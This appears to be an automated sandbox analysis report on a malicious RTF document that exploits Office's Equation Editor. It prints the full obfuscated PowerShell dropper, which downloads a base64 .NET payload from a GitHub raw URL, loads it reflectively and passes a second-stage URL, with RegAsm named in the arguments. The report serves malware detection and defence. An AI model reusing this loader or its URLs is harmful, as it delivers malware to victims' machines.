Overview

overview

10

Static

static

1

8f76e86093...2e.rtf

windows7-x64

10

8f76e86093...2e.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    02/10/2024, 06:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8f76e86093d71f34c2e6f824984034185964f3d15c28df1b61adf5165fbb212e.rtf

  • Size

    67KB

  • MD5

    c9ac55d64a51738b57f065449c7e3911

  • SHA1

    7b9dd5b4e76e99d711b0fe11582e6ff06d9ca830

  • SHA256

    8f76e86093d71f34c2e6f824984034185964f3d15c28df1b61adf5165fbb212e

  • SHA512

    6d78c5a5cfc7fa34942e87ceae41d6e97debaa9469831ffbc4482c9fc1b531a171b1a12fe6ff3902b8919aee94bdf619cd0b43daba07166d9e47042a9eaf8e60

  • SSDEEP

    768:ZD+xsejlud5HY1ayCyu7OHAzlzjRYEX4Bo:ZGjE3qy7OglR9XWo

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8f76e86093d71f34c2e6f824984034185964f3d15c28df1b61adf5165fbb212e.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2892
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceworkwithpcitureupdateson.vBS"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2912
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2684

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      e10274163a8e2128e35666f61ca87d62

      SHA1

      2e31b18c29e06944f61b7a830e504cfabff8892f

      SHA256

      c2367a9e38f2bb77f26bf53b37ffedffb4dc61339db503fe7363aa533a4237ef

      SHA512

      8cff28b45c6184c192906dedab4994daa38f1579f4ce7d9e45e1382827f962a72e550c64533690ff95716de0fe7536eebbf7ddde51b2a9c39885ee87c06a7f6e

      Download Submit

    • C:\Users\Admin\AppData\Roaming\niceworkwithpcitureupdateson.vBS
      Filesize

      250KB

      MD5

      09386235b48255a0b5b5ee106428a9dd

      SHA1

      aaed31297121e1fce8222d417ef8bc90471af3de

      SHA256

      5e78d2baed8277aff8d71f752f4ca00621b6b487a022a942383883a6791364d2

      SHA512

      760e43b96ea2d455b414ed9fbceb6b4ba3cf264e9b86015327db20e3f1ecfeb5210738c9543c26b0ca270fe92170932add452e9935ccd218a65fe76918bb3051

      Download Submit

    • memory/2360-0-0x000000002FA21000-0x000000002FA22000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2360-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2360-2-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2360-23-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

      Download